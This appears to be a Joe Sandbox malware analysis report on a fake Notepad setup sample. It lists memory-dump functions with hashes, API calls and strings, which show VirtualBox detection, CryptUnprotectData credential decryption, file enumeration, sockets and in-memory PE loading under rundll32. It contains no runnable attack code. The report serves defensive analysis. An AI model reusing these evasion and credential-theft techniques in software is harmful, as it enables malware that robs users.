                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ComputerName$??3@malloc
                                      • String ID:
                                      • API String ID: 136612370-0
                                      • Opcode ID: 671c9aace5ebc80e6742531d63df990c1d002d31ec41bca58d739e5d50dcf656
                                      • Instruction ID: 915a9da0b23af790ab32085d1868f86a6538461a14c421423034d87cc62c06b9
                                      • Opcode Fuzzy Hash: 671c9aace5ebc80e6742531d63df990c1d002d31ec41bca58d739e5d50dcf656
                                      • Instruction Fuzzy Hash: F1F0827A60124ABFDB10CBA5DC05FEE77BEDB84754F20005AE901D3240EAB0EA059B71
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: accept-charse$content-lengt
                                      • API String ID: 1475443563-1366698354
                                      • Opcode ID: 464c3d094f2bbe87dc29611f409dbba6472d10e7ec0ccce26a0433d390717d82
                                      • Instruction ID: 4ea6094b9d8c354defda3aac2be11baf88a3545f75474795024d21886879837f
                                      • Opcode Fuzzy Hash: 464c3d094f2bbe87dc29611f409dbba6472d10e7ec0ccce26a0433d390717d82
                                      • Instruction Fuzzy Hash: 17E0261878A3C821D620516A6C02BB61E0B9B50766F4400B6FE949C387F602CE034254
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memset
                                      • String ID: &bn
                                      • API String ID: 2221118986-1044424250
                                      • Opcode ID: 36a3ac9016e4f1e2b6c1041355f55c51403d05f5e7b623dfa5d8b8a21ed02e85
                                      • Instruction ID: b2237709fec5313c83e8206349769bf0eb336f7ead71a956abeee874c288cbc1
                                      • Opcode Fuzzy Hash: 36a3ac9016e4f1e2b6c1041355f55c51403d05f5e7b623dfa5d8b8a21ed02e85
                                      • Instruction Fuzzy Hash: 10E0E67550172077D5746B66EC06F577AE9EF08B10F040908F5C597642D264F851C6A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • sann_train, xrefs: 0040629A
                                      • [M::%s] epoch:%d running_cost:%g validation_cost:%g, xrefs: 004062B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fprintf
                                      • String ID: [M::%s] epoch:%d running_cost:%g validation_cost:%g$sann_train
                                      • API String ID: 383729395-3657084492
                                      • Opcode ID: 536fc80bf20152a525176cd9b6c5b28cd04f87c55a4c7b21effeae297574d4d2
                                      • Instruction ID: ee150b5c59dcbc013f2f222230f2b608886e7c18381d46a1ce3ebc699acf8048
                                      • Opcode Fuzzy Hash: 536fc80bf20152a525176cd9b6c5b28cd04f87c55a4c7b21effeae297574d4d2
                                      • Instruction Fuzzy Hash: 6951E4B06087419FC760EF65D18461ABBE0FF84744F428C2EE4C9A7391D739D8A4CB4A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • sann_train, xrefs: 0040629A
                                      • [M::%s] epoch:%d running_cost:%g validation_cost:%g, xrefs: 004062B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fprintf
                                      • String ID: [M::%s] epoch:%d running_cost:%g validation_cost:%g$sann_train
                                      • API String ID: 383729395-3657084492
                                      • Opcode ID: d11a165c4fd62e8db381ce64a1718b99143299acc3963a9da3798b68e3f877cb
                                      • Instruction ID: 388d141f2a26f2354d81c9231299d27c11ea6a356a9f24b531f1a87b1d736f18
                                      • Opcode Fuzzy Hash: d11a165c4fd62e8db381ce64a1718b99143299acc3963a9da3798b68e3f877cb
                                      • Instruction Fuzzy Hash: 8151C4B4608B419FC760AF65D58461EBBE0FF84744F428C2EE4C5A7351DB39D8A48B46
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WNetGetProviderNameW.MPR(00250000,?,?), ref: 006EB6FC
                                      • StrCmpIW.SHLWAPI(?,VirtualBox Shared Folders), ref: 006EB711
                                      Strings
                                      • VirtualBox Shared Folders, xrefs: 006EB70B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameProvider
                                      • String ID: VirtualBox Shared Folders
                                      • API String ID: 262172401-2247368375
                                      • Opcode ID: 2c5c93b46d0b914f60332ebd1f2d29f7072e452bc0e109bd417b10d4ff68977b
                                      • Instruction ID: d0aa5c79d0f1be9587699d9ec850df7a33c19c4e0ff0f28df846ba90fd24f397
                                      • Opcode Fuzzy Hash: 2c5c93b46d0b914f60332ebd1f2d29f7072e452bc0e109bd417b10d4ff68977b
                                      • Instruction Fuzzy Hash: 1EE086B165530D66DB10DB70DC5AEEB73FC5B00749F2006A1AA12E21C1E6B0DA088A91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fprintf
                                      • String ID: [M::%s] epoch:%d running_cost:%g$sann_train
                                      • API String ID: 383729395-3640795640
                                      • Opcode ID: b2e51d20d2985bf7e3a70f1087eb507be02332b71070f51f7fcab06109c4202b
                                      • Instruction ID: 0c9632d14fcd389c7ad074f7d376c3660d3ea43504b9829637d9e9df69ab9fe7
                                      • Opcode Fuzzy Hash: b2e51d20d2985bf7e3a70f1087eb507be02332b71070f51f7fcab06109c4202b
                                      • Instruction Fuzzy Hash: 11E01A71918740DBC710DF14D94521ABBE0BB85308F92982DF4C597240C338D468CB0A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: memcpy$_errnocalloc
                                      • String ID:
                                      • API String ID: 304464240-0
                                      • Opcode ID: d3d1a4f820d9b04bb3e5ca7db69e3af5387b71a42aa65df6cbd5c0e2f582e437
                                      • Instruction ID: 0cdd1c1ef0db81538b491fc52609e24f70015f25fa836dc24429648008b15321
                                      • Opcode Fuzzy Hash: d3d1a4f820d9b04bb3e5ca7db69e3af5387b71a42aa65df6cbd5c0e2f582e437
                                      • Instruction Fuzzy Hash: 5341D5B46047009FC714EF28D581A1ABBE1FF89310B15C96EE899DB395E734E841DF92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: calloc
                                      • String ID:
                                      • API String ID: 2635317215-0
                                      • Opcode ID: 9704c2ddcd01101b5b3447bc0e0defe599c70d530554d4c70cf0e8d499101d78
                                      • Instruction ID: 19bc5de1db9b640ab0f14ff766f3d039f720e8b407a587cd3c6f95a40729ff9b
                                      • Opcode Fuzzy Hash: 9704c2ddcd01101b5b3447bc0e0defe599c70d530554d4c70cf0e8d499101d78
                                      • Instruction Fuzzy Hash: 2A1128F19093449FD700AF2AC54530AFFE4FF84708F45886EE9889B352D7B9D9448B96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EnterCriticalSection.KERNEL32(?,?,?,?,0040801E), ref: 00407E3C
                                      • TlsGetValue.KERNEL32(?,?,?,?,?,0040801E), ref: 00407E55
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,0040801E), ref: 00407E5F
                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,0040801E), ref: 00407E82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                      • String ID:
                                      • API String ID: 682475483-0
                                      • Opcode ID: aae4735f21bf1e8bcc53294c299d8aaa8c353e67a2084714179bf7a161977662
                                      • Instruction ID: 81857f669f084090ea1895924813cc747da55ee32d87b0419a333fe7377fe075
                                      • Opcode Fuzzy Hash: aae4735f21bf1e8bcc53294c299d8aaa8c353e67a2084714179bf7a161977662
                                      • Instruction Fuzzy Hash: FBF054B2D0A2104ADB10BF75E6C551B76A45F10744F0501BEDD805B346EB38ED49C6DB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:4.8%
                                      Dynamic/Decrypted Code Coverage:95.8%
                                      Signature Coverage:2.7%
                                      Total number of Nodes:403
                                      Total number of Limit Nodes:27

                                      Control-flow Graph

                                      C-Code - Quality: 72%
                                      			E00007FFC7FFC288E1620(void* __eflags, void* __r8) {
                                      				char _v80;
                                      				long long _v120;
                                      				void* _t4;
                                      				void* _t9;
                                      				void* _t11;
                                      				void* _t18;
                                      
                                      				_v120 = lstrlenA();
                                      				_t4 = E00007FFC7FFC288E13A0(0, _t9, __r8, _t11,  &_v80, __r8, _t18);
                                      				if (_t4 != 0) goto 0x288e1670;
                                      				return _t4;
                                      			}









                                      0x7ffc288e164e
                                      0x7ffc288e1653
                                      0x7ffc288e165a
                                      0x7ffc288e166c

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Local$AllocFreelstrlen
                                      • String ID:
                                      • API String ID: 3631127845-2735817509
                                      • Opcode ID: e5d980beb2aba3fd4e105c1f750e3b3dd6f0c06f630552ffada5d6f1831a641d
                                      • Instruction ID: da1f6db67d9b6d51b780721fe2d063eec5d3ab3e43f695de02ce65fe1819b8eb
                                      • Opcode Fuzzy Hash: e5d980beb2aba3fd4e105c1f750e3b3dd6f0c06f630552ffada5d6f1831a641d
                                      • Instruction Fuzzy Hash: B9717D2AA186BB41EB6A9B159C107792691FF48BC2F484136ED5D5B7D0EF3CE404C334
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: DriveDrivesLogicalType
                                      • String ID: :$A$\$\
                                      • API String ID: 4038169723-2970747007
                                      • Opcode ID: b0a694621581a0022aa59e7e97eb46f4cad8955d03962f010717c508dea69b99
                                      • Instruction ID: 4610c7715fd2df0908afa792ee6f6f0950582351bb02a53f2dd2338b155145f0
                                      • Opcode Fuzzy Hash: b0a694621581a0022aa59e7e97eb46f4cad8955d03962f010717c508dea69b99
                                      • Instruction Fuzzy Hash: D6F1803251CE488BEB68EF98D899AEA77F0FB54300F40052AD54FC3152DA78F995C786
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$AllocCloseInformationOpenSectionUnmapViewVirtual
                                      • String ID: MZ
                                      • API String ID: 528985955-2410715997
                                      • Opcode ID: 253709c67f866cad63d2114e2eba81f682406bc4814dbad8a8ae5e500d44b8a8
                                      • Instruction ID: 263f5de13260d22c2c1932c9c6d4ff35b698a44a00df64130b46265479edbaba
                                      • Opcode Fuzzy Hash: 253709c67f866cad63d2114e2eba81f682406bc4814dbad8a8ae5e500d44b8a8
                                      • Instruction Fuzzy Hash: CE31A721B18A494BFF54E7ED5C68B3A7AF5EB99341F50003AE44BC31D2DA2CD8814351
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@ChangeCloseCreateFindNotificationThread_calloc_dbg
                                      • String ID: d
                                      • API String ID: 166476311-2564639436
                                      • Opcode ID: f8442b9e398ab651c0b0ad759ddfe03e1ed3a010777be940d021345a2825fb8b
                                      • Instruction ID: 109d71e2cf4e812fc56031e028747859391f3ee076759d40e9204710effad460
                                      • Opcode Fuzzy Hash: f8442b9e398ab651c0b0ad759ddfe03e1ed3a010777be940d021345a2825fb8b
                                      • Instruction Fuzzy Hash: 4F125F71518E488FEB95EFA9D4596AA7BF0FB54300F10462ED44FC3252DF34E9858B82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: 5473507164dcd3926eec300200079bceabdad213ffc4607040328178f24ee394
                                      • Instruction ID: 0158b668433341a30e39d6e83543494d79c247e7a03aa69677b9368b434fa0c8
                                      • Opcode Fuzzy Hash: 5473507164dcd3926eec300200079bceabdad213ffc4607040328178f24ee394
                                      • Instruction Fuzzy Hash: 7B417332708E484FEB90EBA9D8596AA77F1FB95301F50453AE14BC3291DE38D9448782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                      • String ID:
                                      • API String ID: 2502124517-0
                                      • Opcode ID: 86698cdaea6b070168e9757c8e61cb38fc1f5760e73426677b828c464fbefd93
                                      • Instruction ID: 147d2610a1cba233ba3e65f1d9faacdd8e411f57b0d689ac3b17fd16d416a294
                                      • Opcode Fuzzy Hash: 86698cdaea6b070168e9757c8e61cb38fc1f5760e73426677b828c464fbefd93
                                      • Instruction Fuzzy Hash: AD315F31618A488FE794DF68D8987AB7BF0FB95310F50462AD05BC21E1DF38D985CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FileOpen
                                      • String ID: 0
                                      • API String ID: 2669468079-4108050209
                                      • Opcode ID: 2e6f29b8a254670fdcb33b5353e1a5392e46972b227b1767ba81a870637305b8
                                      • Instruction ID: c559bba7c9a6e534580d816e4f38499270ad0250481869e88a7c5902b9d6a623
                                      • Opcode Fuzzy Hash: 2e6f29b8a254670fdcb33b5353e1a5392e46972b227b1767ba81a870637305b8
                                      • Instruction Fuzzy Hash: 56311071618A888FD794DF99C8D866BB7F0FB99300F50492EE09EC32A1D7789584CB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: cc4e1f58a741e0a847789479910143e1a41a58a390ab4c56df2ab5461faa735f
                                      • Instruction ID: 5785296d3f820378b089df87fee7d1c292307eee870a8e9116920aced8f60de7
                                      • Opcode Fuzzy Hash: cc4e1f58a741e0a847789479910143e1a41a58a390ab4c56df2ab5461faa735f
                                      • Instruction Fuzzy Hash: 37818E3160CE488FEB94EF58D898AA677F1FB94301F14463AD44EC7196DB38E984CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • socket.WS2_32(?,?,?,?,?,?,?,?,00000063,00000062,-00000002,00007DF4B3C44A05), ref: 00007DF4B3C44911
                                        • Part of subcall function 00007DF4B3C444F4: ioctlsocket.WS2_32 ref: 00007DF4B3C44520
                                      • bind.WS2_32(?,?,?,?,?,?,?,?,00000063,00000062,-00000002,00007DF4B3C44A05), ref: 00007DF4B3C44996
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: bindioctlsocketsocket
                                      • String ID:
                                      • API String ID: 3555158474-0
                                      • Opcode ID: 75cc138a21902604a50bf09fc40c7ad2cb5a7822a798501e5f08a21d0d77f662
                                      • Instruction ID: ef548f18dfe2f12f6f0bee3fa34f66612aa40b76349117bcbd1d1dc55a711425
                                      • Opcode Fuzzy Hash: 75cc138a21902604a50bf09fc40c7ad2cb5a7822a798501e5f08a21d0d77f662
                                      • Instruction Fuzzy Hash: E621D53170C5044FE7489BAD98AD27636F6FF54325F20067AD86FC22DADB28DC424741
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: e204f23e07e5fe114be256f26043225e89d310e5d3f21a5691eae402d807ca03
                                      • Instruction ID: 80c430bfcc10bfaa756edc2facfa84e51767bfecd57dec04d341cd19930773c3
                                      • Opcode Fuzzy Hash: e204f23e07e5fe114be256f26043225e89d310e5d3f21a5691eae402d807ca03
                                      • Instruction Fuzzy Hash: A742713151CB888FD764EF99D4996AA77F1FB94300F10452ED58FC3252DA38E991CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: CryptDataUnprotect
                                      • String ID:
                                      • API String ID: 834300711-0
                                      • Opcode ID: 065909b5226e5ffbc6317179f027ca50902e3b2efe95567b1e5a46f5e667f156
                                      • Instruction ID: 64eccb080f87f9cb17e157555edab2f479e821780fd5e3913674c0b97f49a684
                                      • Opcode Fuzzy Hash: 065909b5226e5ffbc6317179f027ca50902e3b2efe95567b1e5a46f5e667f156
                                      • Instruction Fuzzy Hash: E931843175CE484FE748EBA9D85966ABBF1FB8A301F50452DF14BC3292DE39D8418742
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: InformationQuerySystem
                                      • String ID:
                                      • API String ID: 3562636166-0
                                      • Opcode ID: d58f8b538f263f367ae549b4eb4f40a92b68296be0ce84c3cb29e4ca6c126a6e
                                      • Instruction ID: b8da089bd9af446c3f7d47d3e8a0989081bbe4fb250b87dc21e310fc1c18980c
                                      • Opcode Fuzzy Hash: d58f8b538f263f367ae549b4eb4f40a92b68296be0ce84c3cb29e4ca6c126a6e
                                      • Instruction Fuzzy Hash: D5C08C03E18C8A4BED80A7EF4D966293AB0AB89300FC00011A80AC2190E64CE4C08392
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320511595.0000025AA3600000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025AA3600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_25aa3600000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeap$BoundaryDeleteDescriptor
                                      • String ID: $!$!Rcx$!Rex$A$D$E$H$S
                                      • API String ID: 2279964584-3349172591
                                      • Opcode ID: 65066c02667e23bd76fdc9d3f10aea0dbf6c071d317dcde6615cabaccb18c29d
                                      • Instruction ID: 9e61ceb3f4dda1d1958087fd8706eb622122d0c02fa96346728690af9063371e
                                      • Opcode Fuzzy Hash: 65066c02667e23bd76fdc9d3f10aea0dbf6c071d317dcde6615cabaccb18c29d
                                      • Instruction Fuzzy Hash: 03B1543161CB484FD799EE18D88AA9BB3F1FBD9301F504A1EE48AC7142DA70E945C787
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$??3@AllocChangeCloseCreateFindNotificationReadVirtual_malloc_dbg
                                      • String ID: MZ
                                      • API String ID: 3363203691-2410715997
                                      • Opcode ID: 5e4af987994b7acbedf1a617c617516e2b7c83a12c39e074aeeec05ef4365be6
                                      • Instruction ID: 71100e7e16d1dc0db06dd62ebf02d87e808858277ee22f3aa142a4e32a96efc2
                                      • Opcode Fuzzy Hash: 5e4af987994b7acbedf1a617c617516e2b7c83a12c39e074aeeec05ef4365be6
                                      • Instruction Fuzzy Hash: 03419531A4CA088FDB54EBA8D8991BA77F1FB58301F00453AE48FC3181DF78E9918782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Control-flow graph of function 7df4b3c248c8 (graph data not reproduced; the graph marks executed and not-executed blocks and shows a call to VirtualFree)
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID: MZ$MZ$MZ
